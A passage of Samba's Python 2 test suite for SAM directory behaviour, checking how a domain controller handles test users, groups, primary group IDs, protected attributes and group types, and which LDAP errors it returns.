GTYPE_SECURITY_BUILTIN_LOCAL_GROUP, GTYPE_SECURITY_DOMAIN_LOCAL_GROUP,
GTYPE_SECURITY_GLOBAL_GROUP, GTYPE_SECURITY_UNIVERSAL_GROUP,
GTYPE_DISTRIBUTION_DOMAIN_LOCAL_GROUP, GTYPE_DISTRIBUTION_GLOBAL_GROUP,
GTYPE_DISTRIBUTION_UNIVERSAL_GROUP,
ATYPE_SECURITY_GLOBAL_GROUP, ATYPE_SECURITY_UNIVERSAL_GROUP,
ATYPE_SECURITY_LOCAL_GROUP, ATYPE_DISTRIBUTION_GLOBAL_GROUP,
ATYPE_DISTRIBUTION_UNIVERSAL_GROUP, ATYPE_DISTRIBUTION_LOCAL_GROUP,
ATYPE_WORKSTATION_TRUST)
from samba.dcerpc.security import (DOMAIN_RID_USERS, DOMAIN_RID_DOMAIN_MEMBERS,
DOMAIN_RID_DCS, DOMAIN_RID_READONLY_DCS)
from subunit.run import SubunitTestRunner
import unittest
from samba.dcerpc import security
from samba.tests import delete_force
parser = optparse.OptionParser("sam.py [options] <host>")
sambaopts = options.SambaOptions(parser)
parser.add_option_group(sambaopts)
parser.add_option_group(options.VersionOptions(parser))
# use command line creds if available
credopts = options.CredentialsOptions(parser)
parser.add_option_group(credopts)
opts, args = parser.parse_args()
if len(args) < 1:
parser.print_usage()
sys.exit(1)
host = args[0]
lp = sambaopts.get_loadparm()
creds = credopts.get_credentials(lp)
class SamTests(unittest.TestCase):
def setUp(self):
super(SamTests, self).setUp()
self.ldb = ldb
self.base_dn = ldb.domain_dn()
print "baseDN: %s\n" % self.base_dn
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestuser2,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptest\,specialuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestcomputer,cn=computers," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
def test_users_groups(self):
"""This tests the SAM users and groups behaviour"""
print "Testing users and groups behaviour\n"
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group"})
ldb.add({
"dn": "cn=ldaptestgroup2,cn=users," + self.base_dn,
"objectclass": "group"})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["objectSID"])
self.assertTrue(len(res1) == 1)
group_rid_1 = security.dom_sid(ldb.schema_format_value("objectSID",
res1[0]["objectSID"][0])).split()[1]
res1 = ldb.search("cn=ldaptestgroup2,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["objectSID"])
self.assertTrue(len(res1) == 1)
group_rid_2 = security.dom_sid(ldb.schema_format_value("objectSID",
res1[0]["objectSID"][0])).split()[1]
# Try to create a user with an invalid account name
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"sAMAccountName": "administrator"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Try to create a user with an invalid account name
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"sAMAccountName": []})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Try to create a user with an invalid primary group
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"primaryGroupID": "0"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Try to Create a user with a valid primary group
try:
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"primaryGroupID": str(group_rid_1)})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Test to see how we should behave when the user account doesn't
# exist
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement("0", FLAG_MOD_REPLACE,
"primaryGroupID")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
# Test to see how we should behave when the account isn't a user
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement("0", FLAG_MOD_REPLACE,
"primaryGroupID")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_OBJECT_CLASS_VIOLATION)
# Test default primary groups on add operations
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_USERS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user",
"userAccountControl": str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD) })
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_USERS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# unfortunately the INTERDOMAIN_TRUST_ACCOUNT case cannot be tested
# since such accounts aren't directly creatable (ACCESS_DENIED)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD) })
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_DOMAIN_MEMBERS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_SERVER_TRUST_ACCOUNT | UF_PASSWD_NOTREQD) })
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_DCS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Read-only DC accounts are only creatable by
# UF_WORKSTATION_TRUST_ACCOUNT and work only on DCs >= 2008 (therefore
# we have a fallback in the assertion)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "computer",
"userAccountControl": str(UF_PARTIAL_SECRETS_ACCOUNT | UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD) })
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertTrue(res1[0]["primaryGroupID"][0] == str(DOMAIN_RID_READONLY_DCS) or
res1[0]["primaryGroupID"][0] == str(DOMAIN_RID_DOMAIN_MEMBERS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Test default primary groups on modify operations
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD), FLAG_MOD_REPLACE,
"userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_USERS))
# unfortunately the INTERDOMAIN_TRUST_ACCOUNT case cannot be tested
# since such accounts aren't directly creatable (ACCESS_DENIED)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "computer"})
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_USERS))
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(str(UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD), FLAG_MOD_REPLACE,
"userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_DOMAIN_MEMBERS))
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(str(UF_SERVER_TRUST_ACCOUNT | UF_PASSWD_NOTREQD), FLAG_MOD_REPLACE,
"userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertEquals(res1[0]["primaryGroupID"][0], str(DOMAIN_RID_DCS))
# Read-only DC accounts are only creatable by
# UF_WORKSTATION_TRUST_ACCOUNT and work only on DCs >= 2008 (therefore
# we have a fallback in the assertion)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(str(UF_PARTIAL_SECRETS_ACCOUNT | UF_WORKSTATION_TRUST_ACCOUNT | UF_PASSWD_NOTREQD), FLAG_MOD_REPLACE,
"userAccountControl")
ldb.modify(m)
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupID"])
self.assertTrue(len(res1) == 1)
self.assertTrue(res1[0]["primaryGroupID"][0] == str(DOMAIN_RID_READONLY_DCS) or
res1[0]["primaryGroupID"][0] == str(DOMAIN_RID_DOMAIN_MEMBERS))
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
# Recreate account for further tests
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
# Try to set an invalid account name
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["sAMAccountName"] = MessageElement("administrator", FLAG_MOD_REPLACE,
"sAMAccountName")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
# But to reset the actual "sAMAccountName" should still be possible
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountName"])
self.assertTrue(len(res1) == 1)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["sAMAccountName"] = MessageElement(res1[0]["sAMAccountName"][0], FLAG_MOD_REPLACE,
"sAMAccountName")
ldb.modify(m)
# And another (free) name should be possible as well
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["sAMAccountName"] = MessageElement("xxx_ldaptestuser_xxx", FLAG_MOD_REPLACE,
"sAMAccountName")
ldb.modify(m)
# We should be able to reset our actual primary group
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement(str(DOMAIN_RID_USERS), FLAG_MOD_REPLACE,
"primaryGroupID")
ldb.modify(m)
# Try to add invalid primary group
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement("0", FLAG_MOD_REPLACE,
"primaryGroupID")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Try to make group 1 primary - should be denied since it is not yet
# secondary
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement(str(group_rid_1),
FLAG_MOD_REPLACE, "primaryGroupID")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Make group 1 secondary
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_REPLACE, "member")
ldb.modify(m)
# Make group 1 primary
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement(str(group_rid_1),
FLAG_MOD_REPLACE, "primaryGroupID")
ldb.modify(m)
# Try to delete group 1 - should be denied
try:
ldb.delete("cn=ldaptestgroup,cn=users," + self.base_dn)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
# Try to add group 1 also as secondary - should be denied
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
# Try to add invalid member to group 1 - should be denied
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["member"] = MessageElement(
"cn=ldaptestuser3,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
# Make group 2 secondary
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
ldb.modify(m)
# Swap the groups
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement(str(group_rid_2),
FLAG_MOD_REPLACE, "primaryGroupID")
ldb.modify(m)
# Swap the groups (does not really make sense but does the same)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement(str(group_rid_1),
FLAG_MOD_REPLACE, "primaryGroupID")
m["primaryGroupID"] = MessageElement(str(group_rid_2),
FLAG_MOD_REPLACE, "primaryGroupID")
ldb.modify(m)
# Old primary group should contain a "member" attribute for the user,
# the new shouldn't contain anymore one
res1 = ldb.search("cn=ldaptestgroup, cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["member"])
self.assertTrue(len(res1) == 1)
self.assertTrue(len(res1[0]["member"]) == 1)
self.assertEquals(res1[0]["member"][0].lower(),
("cn=ldaptestuser,cn=users," + self.base_dn).lower())
res1 = ldb.search("cn=ldaptestgroup2, cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["member"])
self.assertTrue(len(res1) == 1)
self.assertFalse("member" in res1[0])
# Primary group member
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_DELETE, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Delete invalid group member
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser1,cn=users," + self.base_dn,
FLAG_MOD_DELETE, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Also this should be denied
try:
ldb.add({
"dn": "cn=ldaptestuser2,cn=users," + self.base_dn,
"objectclass": "user",
"primaryGroupID": "0"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
# Recreate user accounts
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
ldb.add({
"dn": "cn=ldaptestuser2,cn=users," + self.base_dn,
"objectclass": "user"})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
ldb.modify(m)
# Already added
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
# Already added, but as <SID=...>
res1 = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["objectSid"])
self.assertTrue(len(res1) == 1)
sid_bin = res1[0]["objectSid"][0]
sid_str = ("<SID=" + ldb.schema_format_value("objectSid", sid_bin) + ">").upper()
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement(sid_str, FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ENTRY_ALREADY_EXISTS)
# Invalid member
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser1,cn=users," + self.base_dn,
FLAG_MOD_REPLACE, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
# Invalid member
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement(["cn=ldaptestuser,cn=users," + self.base_dn,
"cn=ldaptestuser1,cn=users," + self.base_dn],
FLAG_MOD_REPLACE, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
# Invalid member
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement("cn=ldaptestuser,cn=users," + self.base_dn,
FLAG_MOD_REPLACE, "member")
m["member"] = MessageElement("cn=ldaptestuser1,cn=users," + self.base_dn,
FLAG_MOD_ADD, "member")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_NO_SUCH_OBJECT)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
m["member"] = MessageElement(["cn=ldaptestuser,cn=users," + self.base_dn,
"cn=ldaptestuser2,cn=users," + self.base_dn],
FLAG_MOD_REPLACE, "member")
ldb.modify(m)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestuser2,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup2,cn=users," + self.base_dn)
# Make also a small test for accounts with special DNs ("," in this case)
ldb.add({
"dn": "cn=ldaptest\,specialuser,cn=users," + self.base_dn,
"objectclass": "user"})
delete_force(self.ldb, "cn=ldaptest\,specialuser,cn=users," + self.base_dn)
def test_sam_attributes(self):
"""Test the behaviour of special attributes of SAM objects"""
print "Testing the behaviour of special attributes of SAM objects\n"""
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group"})
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["groupType"] = MessageElement(str(GTYPE_SECURITY_GLOBAL_GROUP), FLAG_MOD_ADD,
"groupType")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
# Delete protection tests
for attr in ["nTSecurityDescriptor", "objectSid", "sAMAccountType",
"sAMAccountName", "groupType"]:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m[attr] = MessageElement([], FLAG_MOD_REPLACE, attr)
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m[attr] = MessageElement([], FLAG_MOD_DELETE, attr)
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["primaryGroupID"] = MessageElement("513", FLAG_MOD_ADD,
"primaryGroupID")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["userAccountControl"] = MessageElement(str(UF_NORMAL_ACCOUNT | UF_PASSWD_NOTREQD), FLAG_MOD_ADD,
"userAccountControl")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["objectSid"] = MessageElement("xxxxxxxxxxxxxxxx", FLAG_MOD_ADD,
"objectSid")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["sAMAccountType"] = MessageElement("0", FLAG_MOD_ADD,
"sAMAccountType")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m["sAMAccountName"] = MessageElement("test", FLAG_MOD_ADD,
"sAMAccountName")
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_ATTRIBUTE_OR_VALUE_EXISTS)
# Delete protection tests
for attr in ["nTSecurityDescriptor", "objectSid", "sAMAccountType",
"sAMAccountName", "primaryGroupID", "userAccountControl",
"accountExpires", "badPasswordTime", "badPwdCount",
"codePage", "countryCode", "lastLogoff", "lastLogon",
"logonCount", "pwdLastSet"]:
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m[attr] = MessageElement([], FLAG_MOD_REPLACE, attr)
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
m[attr] = MessageElement([], FLAG_MOD_DELETE, attr)
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
def test_primary_group_token_constructed(self):
"""Test the primary group token behaviour (hidden-generated-readonly attribute on groups) and some other constructed attributes"""
print "Testing primary group token behaviour and other constructed attributes\n"
try:
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"primaryGroupToken": "100"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNDEFINED_ATTRIBUTE_TYPE)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group"})
# Testing for one invalid, and one valid operational attribute, but also the things they are built from
res1 = ldb.search(self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupToken", "canonicalName", "objectClass", "objectSid"])
self.assertTrue(len(res1) == 1)
self.assertFalse("primaryGroupToken" in res1[0])
self.assertTrue("canonicalName" in res1[0])
self.assertTrue("objectClass" in res1[0])
self.assertTrue("objectSid" in res1[0])
res1 = ldb.search(self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupToken", "canonicalName"])
self.assertTrue(len(res1) == 1)
self.assertFalse("primaryGroupToken" in res1[0])
self.assertFalse("objectSid" in res1[0])
self.assertFalse("objectClass" in res1[0])
self.assertTrue("canonicalName" in res1[0])
res1 = ldb.search("cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupToken"])
self.assertTrue(len(res1) == 1)
self.assertFalse("primaryGroupToken" in res1[0])
res1 = ldb.search("cn=ldaptestuser, cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupToken"])
self.assertTrue(len(res1) == 1)
self.assertFalse("primaryGroupToken" in res1[0])
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE)
self.assertTrue(len(res1) == 1)
self.assertFalse("primaryGroupToken" in res1[0])
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["primaryGroupToken", "objectSID"])
self.assertTrue(len(res1) == 1)
primary_group_token = int(res1[0]["primaryGroupToken"][0])
rid = security.dom_sid(ldb.schema_format_value("objectSID", res1[0]["objectSID"][0])).split()[1]
self.assertEquals(primary_group_token, rid)
m = Message()
m.dn = Dn(ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
m["primaryGroupToken"] = "100"
try:
ldb.modify(m)
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_CONSTRAINT_VIOLATION)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
def test_tokenGroups(self):
"""Test the tokenGroups behaviour (hidden-generated-readonly attribute on SAM objects)"""
print "Testing tokenGroups behaviour\n"
# The domain object shouldn't contain any "tokenGroups" entry
res = ldb.search(self.base_dn, scope=SCOPE_BASE, attrs=["tokenGroups"])
self.assertTrue(len(res) == 1)
self.assertFalse("tokenGroups" in res[0])
# The domain administrator should contain "tokenGroups" entries
# (the exact number depends on the domain/forest function level and the
# DC software versions)
res = ldb.search("cn=Administrator,cn=Users," + self.base_dn,
scope=SCOPE_BASE, attrs=["tokenGroups"])
self.assertTrue(len(res) == 1)
self.assertTrue("tokenGroups" in res[0])
ldb.add({
"dn": "cn=ldaptestuser,cn=users," + self.base_dn,
"objectclass": "user"})
# This testuser should contain at least two "tokenGroups" entries
# (exactly two on an unmodified "Domain Users" and "Users" group)
res = ldb.search("cn=ldaptestuser,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["tokenGroups"])
self.assertTrue(len(res) == 1)
self.assertTrue(len(res[0]["tokenGroups"]) >= 2)
# one entry which we need to find should point to domains "Domain Users"
# group and another entry should point to the builtin "Users"group
domain_users_group_found = False
users_group_found = False
for sid in res[0]["tokenGroups"]:
rid = security.dom_sid(ldb.schema_format_value("objectSID", sid)).split()[1]
if rid == 513:
domain_users_group_found = True
if rid == 545:
users_group_found = True
self.assertTrue(domain_users_group_found)
self.assertTrue(users_group_found)
delete_force(self.ldb, "cn=ldaptestuser,cn=users," + self.base_dn)
def test_groupType(self):
"""Test the groupType behaviour"""
print "Testing groupType behaviour\n"
# You can never create or change to a
# "GTYPE_SECURITY_BUILTIN_LOCAL_GROUP"
# Add operation
# Invalid attribute
try:
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": "0"})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
try:
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_SECURITY_BUILTIN_LOCAL_GROUP)})
self.fail()
except LdbError, (num, _):
self.assertEquals(num, ERR_UNWILLING_TO_PERFORM)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
"dn": "cn=ldaptestgroup,cn=users," + self.base_dn,
"objectclass": "group",
"groupType": str(GTYPE_SECURITY_GLOBAL_GROUP)})
res1 = ldb.search("cn=ldaptestgroup,cn=users," + self.base_dn,
scope=SCOPE_BASE, attrs=["sAMAccountType"])
self.assertTrue(len(res1) == 1)
self.assertEquals(int(res1[0]["sAMAccountType"][0]),
ATYPE_SECURITY_GLOBAL_GROUP)
delete_force(self.ldb, "cn=ldaptestgroup,cn=users," + self.base_dn)
ldb.add({
